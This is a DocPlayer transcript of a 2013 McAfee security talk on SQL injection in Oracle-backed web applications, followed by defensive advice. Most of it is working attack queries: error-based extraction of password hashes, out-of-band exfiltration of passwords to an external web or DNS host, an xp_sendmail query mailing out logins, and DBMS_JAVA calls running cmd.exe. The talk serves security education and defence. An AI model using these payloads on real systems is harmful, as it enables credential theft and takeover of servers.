SQL Injection in web applications



Similar documents
Advanced SQL Injection

Hacking and Protecting Oracle DB. Slavik Markovich CTO, Sentrigo

ODTUG - SQL Injection Crash Course for Oracle Developers

NEW AND IMPROVED: HACKING ORACLE FROM WEB. Sumit sid Siddharth 7Safe Limited UK

Manipulating Microsoft SQL Server Using SQL Injection

SQL Injection. Bochum. Alexander Kornbrust 10-Nov Red-Database-Security GmbH

SQL injection: Not only AND 1=1. The OWASP Foundation. Bernardo Damele A. G. Penetration Tester Portcullis Computer Security Ltd

Exposed Database( SQL Server) Error messages Delicious food for Hackers

Ficha técnica de curso Código: IFCPR140c. SQL Injection Attacks and Defense

EC-Council CAST CENTER FOR ADVANCED SECURITY TRAINING. CAST 619 Advanced SQLi Attacks and Countermeasures. Make The Difference CAST.

Time-Based Blind SQL Injection using Heavy Queries A practical approach for MS SQL Server, MS Access, Oracle and MySQL databases and Marathon Tool

Pentesting / Hacking Oracle databases with

Improved Penetration Testing of Web Apps and Databases with MatriXay

How I hacked PacketStorm ( )

SQL Injection 2.0: Bigger, Badder, Faster and More Dangerous Than Ever. Dana Tamir, Product Marketing Manager, Imperva

Automating SQL Injection Exploits

Advanced PostgreSQL SQL Injection and Filter Bypass Techniques

METHODS OF QUICK EXPLOITATION OF BLIND SQL INJECTION DMITRY EVTEEV

How to Make Your Oracle APEX Application Secure

SQL Injection January 23, 2013

The Sins of SQL Programming that send the DB to Upgrade Purgatory Abel Macias. 1 Copyright 2011, Oracle and/or its affiliates. All rights reserved.

1. What is SQL Injection?

Serious Threat. Targets for Attack. Characterization of Attack. SQL Injection 4/9/2010 COMP On August 17, 2009, the United States Justice

An Introduction to SQL Injection Attacks for Oracle Developers. January 2004 INTEGRIGY. Mission Critical Applications Mission Critical Security

PLOUG Oracle Security. Alexander Kornbrust, Jacek Sapiński 16-Oct-2008 OPITZ CONSULTING. Red-Database-Security GmbH

Best Practices for Oracle Databases Hardening Oracle /

Web Application Disassembly with ODBC Error Messages By David Litchfield Director of Security

Circumvent Oracle s Database Encryption and Reverse Engineering of Oracle Key Management Algorithms. Alexander Kornbrust 28-July-2005

Security Vulnerability Notice

OWASP OWASP. The OWASP Foundation Selected vulnerabilities in web management consoles of network devices

Secure Coding (PL/SQL)

Oracle Data Redaction is Broken

SQL INJECTION ATTACKS By Zelinski Radu, Technical University of Moldova

Agenda. SQL Injection Impact in the Real World Attack Scenario (1) CHAPTER 8 SQL Injection

Token Sequencing Approach to Prevent SQL Injection Attacks

INTRUSION PROTECTION AGAINST SQL INJECTION ATTACKS USING REVERSE PROXY

SQL Injection. SQL Injection. CSCI 4971 Secure Software Principles. Rensselaer Polytechnic Institute. Spring

Web Applications Security: SQL Injection Attack

OLH: Oracle Loader for Hadoop OSCH: Oracle SQL Connector for Hadoop Distributed File System (HDFS)

SQL Injection for newbie

Oracle SQL. Course Summary. Duration. Objectives

Yuan Fan Arcsight. Advance SQL Injection Detection by Join Force of Database Auditing and Anomaly Intrusion Detection

SQL Injection and Data Mining through Inference

Duration Vendor Audience 5 Days Oracle End Users, Developers, Technical Consultants and Support Staff

Best Practices for Dynamic SQL

Penetration Testing: Advanced Oracle Exploitation Page 1

Advanced SQL Injection in Oracle databases. Esteban Martínez Fayó

WHITE PAPER. An Introduction to SQL Injection Attacks for Oracle Developers

DOS ATTACKS USING SQL WILDCARDS

BLIND SQL INJECTION (UBC)

Security Analysis. Spoofing Oracle Session Information

Cracking the Perimeter via Web Application Hacking. Zach Grace, CISSP, CEH January 17, Mega Conference

Different ways to guess Oracle database SID

Testing Web Applications for SQL Injection Sam Shober

Oracle PL/SQL Injection

Virtual Private Database Features in Oracle 10g.

Oracle Database 12c: Introduction to SQL Ed 1.1

Network Threats and Vulnerabilities. Ed Crowley

SQL Injection. The ability to inject SQL commands into the database engine through an existing application

Developing SQL and PL/SQL with JDeveloper

SQL Injection Attack. David Jong hoon An

Analysis of SQL injection prevention using a proxy server

Oracle Database 10g: Introduction to SQL

Top 10 Database. Misconfigurations.

Oracle Database 12c Enables Quad Graphics to Quickly Migrate from Sybase to Oracle Exadata

SECURING APACHE : THE BASICS - III

Out of the Fire - Adding Layers of Protection When Deploying Oracle EBS to the Internet

A Brief Introduction to MySQL

Oracle Security Auditing

Oracle Security Auditing

Penetration Testing with Kali Linux

An Oracle White Paper June Migrating Applications and Databases with Oracle Database 12c

Instant SQL Programming

SQL Injection Optimization and Obfuscation Techniques

White Paper. Blindfolded SQL Injection

VIDEO intypedia007en LESSON 7: WEB APPLICATION SECURITY - INTRODUCTION TO SQL INJECTION TECHNIQUES. AUTHOR: Chema Alonso

Paul M. Wright Last updated Sunday 25 th February For

Oracle Audit Vault and Database Firewall

Expert Oracle Application. Express Security. Scott Spendolini. Apress"

Exploiting PL/SQL Injection on Oracle 12c. with only. CREATE SESSION privileges

Revisiting SQL Injection Will we ever get it right? Michael Sutton, Security Evangelist

Oracle Security on Windows

Using Temporary Tables to Improve Performance for SQL Data Services

What? Me, Worry? I've Already Been Hacked. Haven't You?

An Oracle White Paper March Integrating Oracle Database Vault with Oracle Application Express

CSCI110 Exercise 4: Database - MySQL

Webapps Vulnerability Report

Migrating Non-Oracle Databases and their Applications to Oracle Database 12c O R A C L E W H I T E P A P E R D E C E M B E R

Using Foundstone CookieDigger to Analyze Web Session Management

Penetration: from Application down to OS

How to break in. Tecniche avanzate di pen testing in ambito Web Application, Internal Network and Social Engineering

Violating The Corporate Database. Presented by Dan Cornforth Brightstar, IT Security Summit, April 2006

How To Fix A Web Application Security Vulnerability

Security and Control Issues within Relational Databases

Transcription:

SQL Injection in web applications February 2013 Slavik Markovich VP, CTO, Database Security McAfee

About Me Co-Founder & CTO of Sentrigo (now McAfee Database Security) Specialties: Databases, security, and programming http://www.slaviks-blog.com

Thanks To Alexander Kornbrust Red Database Security David Litchfield Sumit Siddharth - 7Safe

Agenda What is SQL Injection Unique Oracle features In-band Injection Advanced Data Retrieval Out-of-band Injection Blind Injection Advanced techniques Infection Privilege elevation Escape the DB to OS Protection against SQL Injection

SQL Injection - Definition A technique that exploits a security vulnerability occurring in the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed.

Oracle Unique Features - I Makes hacker s life harder No stacked queries Unless you get lucky and inject into a PL/SQL block select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=n slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null

Oracle Unique Features - II Makes hacker s life harder Native error messages are hard to control select * from users where username = '' having 1=1 -- and password = '' Msg 8120, Level 16, State 1, Line 1 Column 'users.username' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY Clause.

Oracle Unique Features - III Makes hacker s life harder No easy way to escape DB to OS (no xp_cmdshell) No easy way to do time-based blind SQL Injection (more later) Very limited in what you can do from an injection point Little documentation and few tools for automatic attacks On the other hand Large attack surface Many vulnerabilities

In-band SQL Injection - Unions Select * from employees where dept_id = 1 union select something interesting that has the same number of columns Finding the number of columns by Adding nulls Adding order by # Id dept Loc Inv Qty Cost 1001 1 US 255 144 6.21 1002 1 US 644 100 15.21 Demo 1003 5 EU 999 0 5.05 Name Acct State pass hint date Smith 9234 CA secret asdf 3/1/2011 Jones 8836 MA 123456 qwe 5/5/2010 Doe 1521 NY iloveu lkd 9/7/2009

In-band SQL Injection Errors I SQL> select utl_inaddr.get_host_name('127.0.0.1') from dual; localhost SQL> select utl_inaddr.get_host_name((select username '=' password from dba_users where rownum=1)) from dual; select utl_inaddr.get_host_name((select username '=' password from dba_users where rownum=1)) from dual * ERROR at line 1: ORA-29257: host SYS=8A8F025737A9097A unknown ORA-06512: at "SYS.UTL_INADDR", line 4 ORA-06512: at "SYS.UTL_INADDR", line 35 ORA-06512: at line 1

In-band SQL Injection Errors II utl_inaddr.get_host_name is blocked by default on newer databases Many other options dbms_aw_xml.readawmetadata ordsys.ord_dicom.getmappingxpath ctxsys.drithsx.sn Demo

Advanced Data Retrieval Combining multiple rows into one result ' or dbms_aw_xml.readawmetadata((select SUBSTR (SYS_CONNECT_BY_PATH (username, ';'), 2) csv FROM (SELECT username, ROW_NUMBER() OVER (ORDER BY username ) rn, COUNT(*) OVER () cnt FROM all_users) WHERE rn = cnt START WITH rn = 1 CONNECT BY rn = PRIOR rn + 1), null) is null ' or dbms_aw_xml.readawmetadata((select xmltransform (sys_xmlagg(sys_xmlgen(username)),xmltype('<?xml version="1.0"?><xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/xsl/ Transform"><xsl:template match="/"><xsl:for-each select="/ ROWSET/USERNAME"><xsl:value-of select="text()"/>;</ xsl:foreach></xsl:template></ xsl:stylesheet>')).getstringval() listagg from all_users), null) is null --

Out-of-band SQL Injection Send information via HTTP to an external site via HTTPURI select HTTPURITYPE('http://www.sentrigo.com/' (select password from dba_users where rownum=1)).getclob() from dual; Send information via HTTP to an external site via utl_http select UTL_HTTP.REQUEST ('http://www.sentrigo.com/' (select password from dba_users where rownum=1)) from dual; Send information via DNS (max. 64 bytes) to an external site select SYS.DBMS_LDAP.INIT((select user from dual) '.sentrigo.com',80) from dual; DNS-Request: www.8a8f025737a9097a.sentrigo.com

Blind SQL Injection A guessing game Binary results guess either true or false Requires many more queries Time consuming and resource consuming Can benefit from parallelizing Must be automated Either use decode or case statements Customary used with short or long queries since dbms_lock.sleep is not a function Can be used with functions that receive a timeout like dbms_pipe.receive_message

Privilege Escalation Use of privileged user by the application Or injection is in privileged stored program DML/DDL/DCL is possible Auxiliary functions SYS.KUPP$PROC.CREATE_MASTER_PROCESS DBMS_REPCAT_RPC.VALIDATE_REMOTE_RC (Fixed in July 09 CPU) Injection is in an unprivileged user Many vulnerabilities exist Example - Java

Escape the DB to OS Using Java SELECT DBMS_JAVA.RUNJAVA('oracle/aurora/util/Wrapper c:\ \windows\\system32\\cmd.exe /c dir>c:\\out.lst') FROM DUAL is not null -- SELECT DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper', 'main', 'c:\\windows\\system32\\cmd.exe','/c','dir>c:\\out2.lst') FROM DUAL is not null Using DBMS_SCHEDULER

It s Not science fiction

Protection Against SQL Injection Use static SQL 99% of web applications should never use dynamic statements Use bind variables where possible Always validate user/database input for dynamic statements (dbms_assert) Be extra careful with dynamic statements - get 3 people who do not like you to review and approve your code Use programmatic frameworks that encourage (almost force) bind variables Database schema for your application should have minimal privileges Never return DB errors to the end-user

Resources My Blog www.slaviks-blog.com McAfee Youtube www.youtube.com/mcafeeofficial McAfee Labs Blog www.avertlabs.com/research/blog/ McAfee Risk & Compliance Blog Security Insights Blog siblog.mcafee.com/?cat=46 McAfee Labs Podcast podcasts.mcafee.com/audioparasitics/ McAfee DB Security products http://www.mcafee.com/us/products/database-security/

Q&A

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information